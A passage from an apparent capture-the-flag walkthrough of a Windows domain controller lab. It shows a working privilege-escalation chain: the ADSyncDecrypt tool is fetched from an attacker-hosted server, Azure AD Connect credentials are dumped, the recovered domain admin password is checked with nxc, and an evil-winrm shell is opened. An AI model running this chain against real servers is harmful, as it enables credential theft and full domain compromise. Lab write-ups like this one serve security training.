Before running system scanning tools such as PowerUp.ps1 or WinPEAS, let’s explore the Program Files and Program Files (x86) directories to look for interesting installed/deployed software

dir "C:\PROGRA~1"

Command Output

    Directory: C:\Program Files
Mode                LastWriteTime         Length Name
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:38 PM                Microsoft SQL Server
d-----         1/2/2020   2:25 PM                Microsoft Visual Studio 10.0
d-----         1/2/2020   2:32 PM                Microsoft.NET
d-----         1/3/2020   5:28 AM                PackageManagement
d-----         1/2/2020   9:37 PM                VMware
d-r---         1/2/2020   2:46 PM                Windows Defender
d-----         1/2/2020   2:46 PM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:19 AM                Windows Mail
d-----         1/2/2020   2:46 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----         1/2/2020   2:46 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----         1/3/2020   5:28 AM                WindowsPowerShell

And there is a bunch of Azure AD stuff

As mentioned earlier, one that stands out from the rest is the Microsoft Azure AD Sync

The presence of this directory indicates that a synchronization may have occurred between on-premise AD and Azure using a type of Replication Directory Service (DRS) mechanism

This is related to Azure AD Connect. During its setup, an MSSQL database is created, which, in older versions, stored encrypted credentials that could be decrypted

Likewise, a privilege user account with a MSOL_ prefix is created and granted with DCSync-related rights over the domain object, namely Get-Changes and Get-Changes-All

The community created several tools that automate the database credential extraction and decryption

One of this tools is ADSyncDecrypt

Just download the ZIP file from the releases page, which contains the binary and dll file

Both files must be uploaded to the same directory on the target

From the Attacker

curl --silent --location --request GET "https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip" --remote-name

unzip AdDecrypt.zip

python3 -m http.server 80

From the Target

mkdir C:\Windows\Temp\ADDecrypt
cd C:\Windows\Temp\ADDecrypt

IWR -UseBasicParsing -Uri http://10.10.16.92/AdDecrypt.exe -OutFile .\AdDecrypt.exe

IWR -UseBasicParsing -Uri http://10.10.16.92/mcrypt.dll -OutFile .\mcrypt.dll

The binary must be run from the following directory in order to work correctly

C:\Program Files\Microsoft Azure AD Sync\Bin

So, just proceed as follows

cd "C:\Program Files\Microsoft Azure AD Sync\Bin"

C:\Windows\Temp\ADDecrypt\AdDecrypt.exe -FullSQL

Command Output

AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
 
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
 
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

And we have extracted another password

d0m@in4dminyeah!

The password is supposed to be the one for the Administrator user, let’s check it

nxc smb monteverde --username 'Administrator' --password 'd0m@in4dminyeah!'

Command Output

SMB                      10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB                      10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\Administrator:d0m@in4dminyeah! 

And it is!

So, we can simply connect to the DC via WinrRM again and grab the content of the root.txt file located on the Administrator’s Desktop

evil-winrm --ip monteverde --user 'Administrator' --password 'd0m@in4dminyeah!'

Command Output

Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Get-Content C:\Users\Administrator\Desktop\root.txt

Move on the next! 😊